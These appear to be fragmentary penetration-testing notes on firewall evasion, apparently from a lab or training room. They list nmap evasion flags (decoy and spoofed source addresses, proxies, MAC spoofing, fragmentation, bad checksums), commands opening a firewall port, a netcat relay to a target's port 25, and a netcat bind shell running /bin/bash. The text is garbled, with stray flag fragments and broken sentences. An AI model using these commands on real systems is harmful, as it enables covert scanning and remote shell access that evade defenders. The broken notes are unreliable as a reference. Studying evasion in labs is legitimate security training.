netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869
firewall-cmd --zone=public --add-port=57869/tcp
-D
, mixin real IP address with random adresses. Every port will be requested by any of these addresses.sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP
sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP
sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP
sudo nmap -F --source-port 443 $TARGET_IP
-f
, or 16 bytes via -ff
sudo nmap -Pn -F -f $TARGET_IP
-f
== --mtu 8
sudo nmap -Pn -F --mtu 8
sudo nmap -Pn -F --data-length 64 $TARGET_IP
sudo nmap -Pn -F --ttl 64 $TARGET_IP
IP OPTIONS, --ip-options
recordsas hex String
R
T
U
L $IP $IP $IP
S $IP $IP $IP
Checksum, craft bad checksum via --badsum
to check errors
sudo nmap -Pn -F --badsum $TARGET_IP
nc -lvnp 443 --sh-exec "nc $TARGET_IP 25"
nc -lvnp 8888 -e /bin/bash
and connect
Social_engineering